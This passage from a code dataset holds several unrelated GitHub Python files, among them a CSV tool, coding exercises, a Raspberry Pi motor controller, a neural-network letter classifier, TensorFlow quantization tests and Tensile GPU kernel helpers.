open(filePath,'w')\n \n if fmt=='':\n csv_writer = csv.writer(file_handle,delimiter=' ')\n else:\n csv_writer = csv.writer(file_handle,delimiter=fmt)\n \n if len(title) >0 :\n csv_writer.writerow(title)\n \n csv_writer.writerows(data)\n \n file_handle.close()\n \n print(\"saved end\")\n\ndef generateResultFilePath(dataFilePath,prefix=''):\n\t\n print(\"generating result file path from data file path:%s\" % dataFilePath)\n filename,fileext=os.path.splitext(os.path.basename(dataFilePath))\n \n if prefix=='':\n resultFileName = 'result_'+filename+'.csv'\n else:\n resultFileName = 'result'+prefix+filename+'.csv'\n\n dataFileAbsPath = os.path.abspath(dataFilePath)\n \n app_root_dir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))\t\n app_data_dir = app_root_dir + os.sep + APP_DATA_DIRNAME+os.sep\n app_result_dir = app_root_dir + os.sep + APP_RESULT_DIRNAME+os.sep\n \n result_tmp_dirstr = os.path.dirname(dataFileAbsPath).replace(app_data_dir,'')\n \n resultFileDir = os.path.join(app_result_dir,result_tmp_dirstr)\n\n if not os.path.exists(resultFileDir):\n print(\"create directory:%s \" % resultFileDir)\n os.makedirs(resultFileDir)\n \n resultFilePath = os.path.join(resultFileDir,resultFileName)\n print(\"result file path is:%s\" % resultFilePath)\n print(\"generated end\")\n\n return resultFilePath\n\ndef setSumResultPath(groupColumn,followColumn):\n print(\"setting sum result path\")\n result_tmp_dirstr = os.path.dirname(os.path.abspath(sys.argv[0]))\t\n \n result_filename = 'g'+groupColumn+'_'+'f'+followColumn+'_'+'sum'\t\n result_filename +='.csv'\n \n sumResultPath = os.path.join(result_tmp_dirstr,APP_TOOLS_RESULT_DIRNAME,result_filename)\n \n print(\"sum result path is:%s\" % sumResultPath )\n print(\"set end\")\n\n return sumResultPath\n\n\ndef sumByGroup(sumParams):\n print(\"start acting\")\n\n input_path=sumParams['input_path']\n groupColumnIndex=sumParams['group_column']\n followColumnIndex=sumParams['follow_column']\n\n csvDictData={}\n \n if os.path.isdir(input_path):\n print(\"result file is a directory:%s\" % input_path)\n for root,dirs,files in os.walk(os.path.abspath( input_path)):\n for file in files:\n filename,fileext=os.path.splitext(file)\n if fileext=='.csv':\n singleFileData = []\n resultfileabspath = root+os.sep+file\t\t\t\t\t\n ##\n print(resultfileabspath)\n \n elif os.path.isfile(input_path):\n print(\"input file is a single file:%s\" % input_path)\n resultfileabspath = os.path.abspath(input_path)\n singleFileData = []\n ## \n print(resultfileabspath)\n\n\n\ndef main():\n try:\n opts,args = getopt.getopt(sys.argv[1:],\"hi:g:f:\",[\"--help=\",\"--input=\",\"--group=\",\"--follow=\"])\n except getopt.GetoptError as err:\n print(err) \n usage()\n sys.exit(2)\n\n sumParams = {\n 'input_path':'',\n 'group_column':'',\n 'follow_column':''\n }\n\n\n\n for opt,arg in opts:\n if opt in ('-h',\"--help\"):\n usage()\n sys.exit()\n elif opt in ('-i','--input'):\n sumParams['input_path']=arg\n elif opt in ('-g','--group'):\n sumParams['group_column']=arg\n elif opt in ('-f','--follow'):\n sumParams['follow_column']=arg\n \n\n \n if sumParams['input_path'] != '':\n sumByGroup(sumParams)\n else:\n sys.exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hongshunyang/biotools.ucsc","sub_path":"genome/tools/_app.py","file_name":"_app.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38873375923","text":"import re\nimport json\n\n\nwhile True:\n\ts = input('>')\n\t# select id,name from book,user by where uid in (select id from book where bid <= 10);\n\t# .匹配除换行以外任何字符 + 一个或以上\n\tresult = re.match(r'\\s*select\\s*(?P.+)\\s*from\\s*(?P.+)\\s*by where\\s*(?P.*)\\s*$', s)\n\t\n\tif result:\n\t\tfor k,v in result.groupdict().items():\n\t\t\tprint(k, ': ', v)\n\telse:\n\t\tprint('None')","repo_name":"MoCuishle28/python-practice","sub_path":"DBMS_Simulate/re_test.py","file_name":"re_test.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19533448934","text":"def primeFactors(n):\n a=[]\n while n % 2 == 0:\n a.append(2)\n n = n / 2\n for i in range(3,int(abs(n)**0.5)+1,2):\n while n % i== 0:\n a.append(i)\n n = n / i\n if abs(n) > 2:\n a.append(abs(n))\n return list(set(sorted(a)))\ndef sum_for_list(lst):\n a=[[x,primeFactors(x)] for x in lst]\n b={}\n for x,y in a:\n for z in y:\n if z in b:\n b[z]+=x\n else:\n b[z]=x\n return [[x,b[x]] for x in sorted(b.keys())]\n","repo_name":"sukanthm/codeWars_solutions","sub_path":"Sum by Factors.py","file_name":"Sum by Factors.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24729947891","text":"from display_conf import run\nimport sqlite3\n\n\n@run\ndef tkgpio_main():\n from gpiozero import LED, Button, MCP3008, Motor\n from time import sleep\n from Adafruit_CharLCD import Adafruit_CharLCD\n\n work_led_TO1 = LED(16)\n work_led_TO2 = LED(19)\n work_led_ODZ = LED(21)\n potenciometer1_TO1 = MCP3008(0)\n potenciometer2_TO2 = MCP3008(2)\n potenciometer3_ODZ = MCP3008(6)\n motor_TO1 = Motor(22, 23)\n motor_TO2 = Motor(26, 24)\n motor_ODZ = Motor(20, 12)\n lcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\n lcd2 = Adafruit_CharLCD(8, 25, 18, 14, 17, 27, 16, 2)\n switch_TO1 = Button(15)\n swtich_TO2 = Button(13)\n switch_ODZ = Button(11)\n conn = sqlite3.connect(\n \"C:/python_projects/praca_mgr/apps/flask_app/flask_application/instance/site.db\"\n )\n\n cur_slider = conn.cursor()\n cur_checker = conn.cursor()\n\n while True:\n cur_checker.execute(\"SELECT * FROM checker\")\n cur_slider.execute(\"SELECT * FROM slider\")\n\n slider_list = cur_slider.fetchone()\n checker_list = cur_checker.fetchone()\n\n if checker_list[4] == \"false\":\n if switch_TO1.is_pressed:\n work_led_TO1.on()\n motor_TO1.forward(potenciometer1_TO1.value)\n lcd.clear()\n lcd.message(\"TO1 Hz: %.2f\" % (potenciometer1_TO1.value * 50))\n\n if swtich_TO2.is_pressed:\n work_led_TO2.on()\n motor_TO2.forward(potenciometer2_TO2.value)\n lcd2.clear()\n lcd2.message(\"TO2: %.2f\" % (potenciometer2_TO2.value * 50))\n\n if switch_ODZ.is_pressed:\n work_led_ODZ.on()\n motor_ODZ.forward(potenciometer3_ODZ.value)\n else:\n work_led_ODZ.off()\n motor_ODZ.stop()\n else:\n work_led_TO2.off()\n work_led_ODZ.off()\n motor_TO2.stop()\n motor_ODZ.stop()\n lcd2.clear()\n lcd2.message(\"TO2 Hz: %.2f\" % (0))\n else:\n work_led_TO1.off()\n work_led_TO2.off()\n work_led_ODZ.off()\n motor_TO1.stop()\n motor_TO2.stop()\n motor_ODZ.stop()\n lcd.clear()\n lcd.message(\"TO1 Hz: %.2f\" % (0))\n lcd2.clear()\n lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n if checker_list[4] == \"true\":\n if checker_list[1] == \"true\":\n work_led_TO1.on()\n motor_TO1.forward((float(slider_list[1])) / 50.0)\n lcd.clear()\n lcd.message(\"TO1 Hz: %.2f\" % (float(slider_list[1])))\n\n if checker_list[2] == \"true\":\n work_led_TO2.on()\n motor_TO2.forward((float(slider_list[2])) / 50)\n lcd2.clear()\n lcd2.message(\"TO2: %.2f\" % (float(slider_list[2])))\n\n if checker_list[3] == \"true\":\n work_led_ODZ.on()\n motor_ODZ.forward(float(slider_list[3]) / 50)\n else:\n work_led_ODZ.off()\n motor_ODZ.stop()\n\n else:\n work_led_TO2.off()\n work_led_ODZ.off()\n motor_TO2.stop()\n motor_ODZ.stop()\n lcd2.clear()\n lcd2.message(\"TO2 Hz: %.2f\" % (0))\n else:\n work_led_TO1.off()\n work_led_TO2.off()\n work_led_ODZ.off()\n motor_TO1.stop()\n motor_TO2.stop()\n motor_ODZ.stop()\n lcd.clear()\n lcd.message(\"TO1 Hz: %.2f\" % (0))\n lcd2.clear()\n lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n elif checker_list[4] == \"true\" and not switch_TO1.is_pressed:\n work_led_TO1.off()\n work_led_TO2.off()\n work_led_ODZ.off()\n motor_TO1.stop()\n motor_TO2.stop()\n motor_ODZ.stop()\n lcd.clear()\n lcd.message(\"TO1 Hz: %.2f\" % (0))\n lcd2.clear()\n lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n sleep(0.05)\n","repo_name":"barteksyko/tkgpio","sub_path":"run_tkgpio.py","file_name":"run_tkgpio.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988223028","text":"'''Vamos converter metros para centímetros?!\n Escreva um código que: \n 1) Solicita a quantidade de metros. \n 2) Calcula a quantidade de centímetros, com base na quantidade de metros informada. \n 3) Imprima o resultado. \n DICAS 1)\n 1 metro tem 100 centímetros, ou seja, multiplique por 100 o valor do metro. \n 2) O valor do metro deve ser convertido para float().\n'''\n\n\nmetros = float(input('Informe a quantidade de metros: '))\nmetros_para_centimetro = lambda metros, centimetros=100: metros * centimetros\nprint(f'{metros_para_centimetro(metros)}cm')\n","repo_name":"carlosrjhoe/Python","sub_path":"Livro_Guia_prático_de_programação_python/Exercicios/exercicio_07.py","file_name":"exercicio_07.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1276639427","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sb\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.neural_network import MLPClassifier\n\ndata_dir = \"/Users/cameronwalcott/Dropbox/Mac/Desktop/ITP 499/Datasets\"\nalphabet = pd.read_csv(os.path.join(data_dir,\"alphabet_letters.csv\"))\n# print(alphabet.head())\n\nwords = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',\n 14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',23:'X',24:'Y',25:'Z'}\n\n\ntarget = alphabet.iloc[:,:1]\nfeatures = alphabet.iloc[:,1:]\n# print(target)\n# print(features)\n\n\n# print(features.shape)\n# print(target.shape)\n#\n#\n# plt.figure(1)\n# sb.countplot(x=\"label\", data=target)\n# plt.show()\n#\n#\nletter = features.iloc[1340,:]\nletter = np.array(letter)\nletter = letter.reshape(28,28)\nl = words[target.iloc[1340,0]]\n\n# plt.imshow(letter, cmap=\"gray\")\n# plt.title(\"The letter is \" + str(l))\n# plt.show()\n\n\nX_train, X_test, y_train, y_test = \\\n train_test_split(features,target,test_size=0.3, random_state=2021, stratify=target)\n\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n\nmlp = MLPClassifier(hidden_layer_sizes=(100,100,100), activation=\"logistic\", max_iter=5,\n alpha=0.0001, solver=\"adam\", random_state=2021, learning_rate_init=0.01, verbose=True)\n\n# Train the network\nmlp.fit(X_train, y_train)\n\n#Display accuracy of the test data\nprint(\"The accuracy of the test data is: \", mlp.score(X_test, y_test))\n\n# Display confusion matrix\nplot_confusion_matrix(mlp, X_test, y_test)\nplt.show()\n\n\ny_pred = mlp.predict(X_test)\nprediction = y_pred[0]\n\nrow1 = X_test.iloc[0,:]\nrow1 = np.array(row1)\nrow1 = row1.reshape(28,28)\n\nplt.imshow(row1, cmap=\"gray\")\nplt.title(\"The predicted letter is \" + str(words[prediction]) + \" and the actual letter is \" + str(words[y_test.iloc[0,0]]))\nplt.show()\n\n\n\nfailed = [i for i in range(len(y_test)) if y_test[i] != y_pred[i]]\n# f_index = failed.sample(n=1).index\n#\n# sample = np.array(X_test.loc[f_index]).reshape(28,28)\n#\n# plt.imshow(sample, cmap=\"gray\")\n# plt.title(\"The failed predicted digit is: \" + str(y_pred[f_index]) + \". The Actual digit is: \" + str(int(y_test[f_index])))\n# plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"noremac19/DS-ML","sub_path":"walcott_cameron_hw5.py","file_name":"walcott_cameron_hw5.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15936913381","text":"\nimport numpy as np\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.platform import test\nclass QuantizedOpsTest(test.TestCase):\n def __init__(self, method_name=\"runTest\"):\n super(QuantizedOpsTest, self).__init__(method_name)\n def testQuantizeOp(self):\n expected_output = [1, 1, 2, 127, 255, 255]\n with self.session(use_gpu=False) as sess:\n x = constant_op.constant(\n [1.0, 1.25, 1.75, 127.0, 255.0, 500.0],\n shape=[6],\n dtype=dtypes.float32)\n x_min = 0.0\n x_max = 255.0\n op = array_ops.quantize(x, x_min, x_max, dtypes.quint8, mode=\"MIN_FIRST\")\n value = self.evaluate(op)\n self.assertArrayNear(expected_output, value.output, 0.1)\n def testDequantizeOp(self):\n expected_output = [1.0, 2.0, 4.0, 8.0, 16.0, 255.0]\n inp = np.array([1, 2, 4, 8, 16, 255]).astype(np.uint8)\n with self.session(use_gpu=False) as sess:\n x = constant_op.constant(inp, shape=[6], dtype=dtypes.quint8)\n x_min = 0.0\n x_max = 255.0\n op = array_ops.dequantize(x, x_min, x_max, mode=\"MIN_FIRST\")\n value = self.evaluate(op)\n self.assertArrayNear(expected_output, value, 0.1)\n def testAxis(self):\n def scale_per_slice(shape, axis, values):\n out = np.take(values, np.remainder(np.arange(np.prod(shape)),\n len(values))).reshape(shape)\n if axis is not None:\n scale_shape = [1] * len(shape)\n scale_shape[axis] = shape[axis]\n out *= np.arange(1, shape[axis] + 1).reshape(scale_shape)\n return out\n shape = np.array([2, 3, 4, 5])\n values = np.array([-1, -0.5, 0, 0.3, 0.8, 0.555, 0.5], dtype=np.float32)\n quant_values = np.array([-128, -64, 0, 38, 102, 71, 64], dtype=np.int32)\n for axis in [None, 0, 1, 2, 3]:\n inputs = constant_op.constant(scale_per_slice(shape, axis, values))\n expected_quantized = scale_per_slice(shape, None, quant_values)\n if axis is None:\n min_range, max_range = -1.0, 0.8\n else:\n num_slices = shape[axis]\n min_range, max_range = [], []\n for slice_idx in range(num_slices):\n min_range.append(-1.0 * (slice_idx + 1))\n max_range.append(0.8 * (slice_idx + 1))\n quantized = self.evaluate(\n array_ops.quantize(\n inputs,\n min_range,\n max_range,\n T=dtypes.qint8,\n mode=\"SCALED\",\n round_mode=\"HALF_TO_EVEN\",\n axis=axis)).output\n self.assertAllEqual(quantized, expected_quantized)\n if axis is not None:\n quantized = self.evaluate(\n array_ops.quantize(\n inputs,\n min_range,\n max_range,\n T=dtypes.qint8,\n mode=\"SCALED\",\n round_mode=\"HALF_TO_EVEN\",\n axis=(axis - 4))).output\n self.assertAllClose(quantized, expected_quantized)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/quantized_ops_test.py.transformed.py","file_name":"quantized_ops_test.py.transformed.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21000983810","text":"from .TensileInstructions import DataType, Label, Module, vgpr, sgpr, accvgpr, \\\n Holder, SBranchIfNotZero\nfrom .TensileInstructions.Instructions import *\n\ndef allocPostLoopSrdSuppressRaw(ch: str, chAddress: str, labelStr: str, sgprLength) -> Module:\n module = Module(\"allocPostLoopSrdSuppress\")\n label = Label(\"%sAddrValid\"%labelStr, \"\")\n label2 = Label(\"%sAddrValid_End\"%labelStr, \"\")\n # Buffer-load uses one base read pointer stored in the SRD - set it here:\n module.add(SMovB32(dst=sgpr(\"Srd%s+0\"%ch), src=sgpr(\"Address%s+0\"%chAddress), comment=\"init SRD base address (lower)\" ))\n module.add(SMovB32(dst=sgpr(\"Srd%s+1\"%ch), src=sgpr(\"Address%s+1\"%chAddress), comment=\"init SRD base address (upper) + other fields\" ))\n module.add(SMovB32(dst=sgpr(\"Srd%s+3\"%ch), src=\"Srd127_96\", comment=\"Set bits 127_96 in post-loop SRD\"))\n module.add(SBranchIfNotZero(\"Address%s\"%chAddress, DataType('int64'), label))\n module.add(SMovB32(dst=sgpr(\"Srd%s+2\"%ch), src=0))\n module.add(SBranch(label2.getLabelName()))\n module.add(label)\n module.add(SMovB32(dst=sgpr(\"Srd%s+2\"%ch), src=sgprLength))\n module.add(label2)\n module.addSpaceLine()\n return module\n\ndef allocPostLoopSrdSuppress(ch: str, labelStr: str, sgprLength) -> Module:\n return allocPostLoopSrdSuppressRaw(ch, ch, labelStr, sgprLength)\n\n##############################################################################\n# WaitCnt\n# 3 components can contribute to the waitcnt:\n# - Pending global reads. (skipGlobalRead)\n# - Pending local write. (skipLocalWrite)\n# - Pending local reads (skipLocalRead)\n# If a skip* arg is -1, the associated component does not contribute to\n# the expected lgkmcnt or vmcnt\n##############################################################################\ndef wait(states, kernel, tPA, tPB, skipGlobalRead, skipLocalWrite, \\\n skipLocalRead, conservativeWaitCnt: int, comment):\n # skip = -1 -> ignore\n # skip = n -> waitcnt(n*num)\n\n lgkmcnt = 0 if skipLocalWrite > -1 or skipLocalRead > -1 else -1\n\n if skipLocalWrite > -1 or skipLocalRead > -1:\n if skipLocalWrite > -1:\n numA = 0 if kernel[\"DirectToLdsA\"] \\\n else tPA[\"nrp\"]*tPA[\"nrc\"]*max(tPA[\"nwcv\"],tPA[\"nwpv\"])//tPA[\"nwcvpi\"]\n numB = 0 if kernel[\"DirectToLdsB\"] \\\n else tPB[\"nrp\"]*tPB[\"nrc\"]*max(tPB[\"nwcv\"],tPB[\"nwpv\"])//tPB[\"nwcvpi\"]\n\n numM = 0\n if kernel[\"ProblemType\"][\"Sparse\"] and not kernel[\"DirectToVgprSparseMetadata\"]:\n tPM = tPA[\"tpsMetadata\"] if tPA[\"is_sparse\"] else tPB[\"tpsMetadata\"]\n numM = tPM[\"nrp\"]*tPM[\"nrc\"]*max(tPM[\"nwcv\"],tPM[\"nwpv\"])//tPM[\"nwcvpi\"]\n lgkmcnt += skipLocalWrite * (numA + numB + numM)\n if skipLocalRead > -1:\n readsPerIter = states.numReadsPerIterA + states.numReadsPerIterB + states.numReadsPerIterMetadata\n lgkmcnt += skipLocalRead * readsPerIter\n\n vmcnt = 0 if skipGlobalRead > -1 else -1\n if skipGlobalRead > -1:\n numA = kernel[\"NumLoadsPerpendicularA\"] * kernel[\"NumLoadsCoalescedA\"]\n numB = kernel[\"NumLoadsPerpendicularB\"] * kernel[\"NumLoadsCoalescedB\"]\n numM = 0\n if kernel[\"ProblemType\"][\"Sparse\"] and not kernel[\"DirectToVgprSparseMetadata\"]:\n numM = kernel[\"NumLoadsPerpendicularMetadata\"] * kernel[\"NumLoadsCoalescedMetadata\"]\n vmcnt += skipGlobalRead * (numA + numB + numM)\n\n # Unlike flat loads, BufferLoad do not increment the outstanding\n # lgkmcnt\n if lgkmcnt > -1 and not kernel[\"BufferLoad\"]:\n lgkmcnt += skipGlobalRead * (numA + numB + numM)\n\n if (conservativeWaitCnt & 0x2) and skipGlobalRead != -1 or \\\n (conservativeWaitCnt & 0x4) and skipLocalWrite != -1 or \\\n (conservativeWaitCnt & 0x8) and skipLocalRead != -1:\n imod = Module(\"ConservativeWaitCnt\")\n imod.add(SWaitCnt(lgkmcnt=0, vmcnt=0, vscnt=0, comment=\"debug %s\"%comment))\n imod.add(SBarrier(comment=\"debug\"))\n return imod\n\n maxLgkmcnt = states.asmCaps[\"MaxLgkmcnt\"]\n lgkmcnt = min(lgkmcnt, maxLgkmcnt)\n if lgkmcnt >= 0 and vmcnt >= 0:\n vmcnt = -1 # preserve prior behavior of removing vmcnt here?\n maxVmcnt = states.asmCaps[\"MaxVmcnt\"]\n vmcnt = min(vmcnt, maxVmcnt)\n # This line is added for backward compatibility\n vscnt = vmcnt if lgkmcnt != -1 and vmcnt != -1 and states.archCaps[\"SeparateVscnt\"] else -1\n\n waitcnt = SWaitCnt(lgkmcnt,vmcnt, vscnt, comment)\n return waitcnt\n\n##############################################################################\n# SyncThreads\n##############################################################################\ndef syncThreads(kernel, archCaps, comment=\"\"):\n imod = Module(\"syncThreads\")\n if kernel[\"NumThreads\"] > kernel[\"WavefrontSize\"]:\n if archCaps[\"SeparateVscnt\"]:\n imod.add(SWaitCnt(lgkmcnt=\"null\", comment=\"extra navi wait\"))\n elif kernel[\"ScheduleIterAlg\"] == 2 \\\n or kernel[\"PrefetchGlobalRead\"] == 2:\n imod.addComment(\"Skip force waitcnt0\")\n elif archCaps[\"Waitcnt0Disabled\"]:\n # FIXME: should we add s_waitcnt_vscnt?\n imod.add(SWaitCnt(lgkmcnt=0, vmcnt=0, vscnt=-1, comment=\"force waitcnt0\"))\n\n imod.add(SBarrier(comment=comment))\n else:\n imod.addComment(\"Skip barrier: NumThreads=%s\"%(kernel[\"NumThreads\"]) + \\\n comment)\n return imod\n\ndef _getAccToArchInfo(kernel):\n matrixInstM = (kernel[\"MatrixInstM\"] * kernel[\"MatrixInstBM\"]) if (kernel[\"MatrixInstM\"] == 4) else kernel[\"MatrixInstM\"]\n matrixInstN = (kernel[\"MatrixInstN\"] * kernel[\"MatrixInstBN\"]) if (kernel[\"MatrixInstN\"] == 4) else kernel[\"MatrixInstN\"]\n matrixInstBM = 1 if (kernel[\"MatrixInstM\"] == 4) else kernel[\"MatrixInstBM\"]\n matrixInstBN = 1 if (kernel[\"MatrixInstN\"] == 4) else kernel[\"MatrixInstBN\"]\n\n OutputsPerMFMA1B = matrixInstM * matrixInstN // kernel[\"WavefrontSize\"]\n VectorWidth0 = kernel[\"VectorWidthA\"]\n outerTT0 = kernel[\"MIWaveTile\"][0] // VectorWidth0\n VectorWidth1 = kernel[\"VectorWidthB\"]\n outerTT1 = kernel[\"MIWaveTile\"][1] // VectorWidth1\n return matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1\n\ndef getAccToArchLen(kernel):\n matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1 = _getAccToArchInfo(kernel)\n return (outerTT1 * outerTT0 * matrixInstBN * matrixInstBM * OutputsPerMFMA1B * VectorWidth0 * VectorWidth1)\n\n##############################################################################\n# accToArchMapper\n# Provides forward (acc2arch) and backward (arch2acc) index transformation\n# - Forward transformation is currently used for acc->vgpr copying\n# - Backward transformation is used in ShiftVectorComponent() to map logical\n# C-tile index back to original acc index\n##############################################################################\ndef accToArchMapper(kernel):\n acc2arch = dict()\n arch2acc = dict()\n\n matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1 = _getAccToArchInfo(kernel)\n\n for wgIdx1 in range(0, outerTT1):\n for wgIdx0 in range(0, outerTT0):\n for bIdx1 in range(0, matrixInstBN):\n for bIdx0 in range(0, matrixInstBM):\n for tIdx in range(0, OutputsPerMFMA1B):\n for vw1 in range(0, VectorWidth1):\n for vw0 in range(0, VectorWidth0):\n src, dst = 0, 0\n if kernel[\"SourceSwap\"]:\n src = tIdx + OutputsPerMFMA1B * (bIdx0 + matrixInstBM * (bIdx1 + matrixInstBN * (vw0 + VectorWidth0 * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (wgIdx1))))))\n dst = vw0 + VectorWidth0 * (bIdx0 + matrixInstBM * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (tIdx + OutputsPerMFMA1B * (bIdx1 + matrixInstBN * (wgIdx1))))))\n else:\n src = tIdx + OutputsPerMFMA1B * (bIdx1 + matrixInstBN * (bIdx0 + matrixInstBM * (vw0 + VectorWidth0 * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (wgIdx1))))))\n dst = vw0 + VectorWidth0 * (tIdx + OutputsPerMFMA1B * (bIdx0 + matrixInstBM * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (bIdx1 + matrixInstBN * (wgIdx1))))))\n acc2arch[src] = dst\n arch2acc[dst] = src\n return acc2arch, arch2acc\n\ndef accVgprImagNumOffset(kernel):\n acc2arch, _ = accToArchMapper(kernel)\n return len(acc2arch) * kernel[\"MIRegPerOut\"]\n\n##############################################################################\n# MapAcctoArch\n# function to map MFMA Acc Registers to Arch VGPR register\n##############################################################################\ndef mapAcctoArchRegs(kernel):\n acc2arch, _ = accToArchMapper(kernel)\n\n complexMultiplier = 2 if kernel[\"ProblemType\"][\"DataType\"].isComplex() else 1\n imod = Module(\"AccVgprRead\")\n imod.itemList = [None] * kernel[\"MIRegPerOut\"] * complexMultiplier * len(acc2arch)\n accImOffset = accVgprImagNumOffset(kernel)\n for i in range(len(acc2arch)):\n for cm in range(complexMultiplier):\n for r in range(kernel[\"MIRegPerOut\"]):\n destIdx = (acc2arch[i]*complexMultiplier + cm) * kernel[\"MIRegPerOut\"] + r\n srcIdx = ((i * kernel[\"MIRegPerOut\"] + r) + (cm*accImOffset))\n if not kernel[\"MIArchVgpr\"]:\n accStr = accvgpr(srcIdx)\n imod.itemList[destIdx] = VAccvgprReadB32(dst=vgpr(Holder(name=\"ValuC\")),\n src=accStr,\n comment=\"copy acc to vreg[%u]\" % destIdx)\n else:\n imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n src=vgpr(\"ValuC+%u\"%srcIdx),\n comment=\"copy MI out reg to vreg[%u]\" % destIdx)\n return imod\n\n##############################################################################\n# MulMIoutAlphaToArch\n# function to handle MFMA alpha*MIout to Arch VGPR register\n##############################################################################\ndef mulMIoutAlphaToArch(kernel, startVgprAlphaTmp):\n acc2arch, _ = accToArchMapper(kernel)\n\n imod = Module(\"MulAlpha\")\n imod.itemList = [None] * len(acc2arch)\n for i in range(len(acc2arch)):\n destIdx = acc2arch[i]\n srcIdx = i * kernel[\"MIRegPerOut\"]\n if kernel[\"ProblemType\"][\"ComputeDataType\"].isDouble():\n imod.itemList[destIdx] = VMulF64(dst=vgpr(Holder(name=\"ValuC\"),2),\n src0=sgpr(\"Alpha\",2), src1=vgpr(\"ValuC+%u\"%srcIdx,2),\n comment=\"Multiply MI out reg with alpha\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingle() or \\\n (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n imod.itemList[destIdx] = VMulF32(dst=vgpr(Holder(name=\"ValuC\")),\n src0=sgpr(\"Alpha\"), src1=vgpr(\"ValuC+%u\"%srcIdx),\n comment=\"Multiply MI out reg with alpha\")\n elif (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and not kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n imod.itemList[destIdx] = VMulPKF16(dst=vgpr(Holder(name=\"ValuC\")),\n src0=sgpr(\"Alpha\"),\n src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Multiply MI out reg with alpha\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isInt32():\n imod.itemList[destIdx] = VMulLOU32(dst=vgpr(Holder(name=\"ValuC\")),\n src0=sgpr(\"Alpha\"), src1=vgpr(\"ValuC+%u\"%srcIdx),\n comment=\"Multiply MI out reg with alpha\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingleComplex():\n accImOffset = accVgprImagNumOffset(kernel, lrvwB)\n cimod = Module()\n # cannot use tmp vgpr for write batch, use allocated vgpr instead\n vtmp1 = startVgprAlphaTmp\n vtmp2 = vtmp1 + 1\n # tmp1 = a.real * b.real\n cimod.add(VMulF32(dst=vgpr(vtmp1), src0=sgpr(\"Alpha+0\"), src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"\"))\n # tmp2 = a.imag * b.real\n cimod.add(VMulF32(dst=vgpr(vtmp2), src0=sgpr(\"Alpha+1\"), src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"\"))\n # c.real = a.real * b.real - a.imag * b.imag = tmp1 - a.imag * b.imag\n cimod.add(VFmaF32(dst=vgpr(Holder(name=\"ValuC\")), src0=sgpr(\"Alpha+1\"), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), src2=vgpr(vtmp1)))\n # c.imag = a.real * b.imag + a.imag * b.real = a.real * b.imag + tmp2\n cimod.add(VFmaF32(dst=vgpr(Holder(name=\"ValuC+1\")), src0=sgpr(\"Alpha+0\"), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), src2=vgpr(vtmp2)))\n imod.itemList[destIdx] = cimod\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isDoubleComplex():\n accImOffset = accVgprImagNumOffset(kernel)\n cimod = Module()\n # cannot use tmp vgpr for write batch, use allocated vgpr instead\n vtmp1 = startVgprAlphaTmp\n vtmp2 = vtmp1 + 2\n # tmp1 = a.real * b.real\n cimod.add(VMulF64(dst=vgpr(vtmp1,2), src0=sgpr(\"Alpha+0\",2), src1=vgpr(\"ValuC+%u\"%srcIdx,2)))\n # tmp2 = a.imag * b.real\n cimod.add(VMulF64(dst=vgpr(vtmp2,2), src0=sgpr(\"Alpha+2\",2), 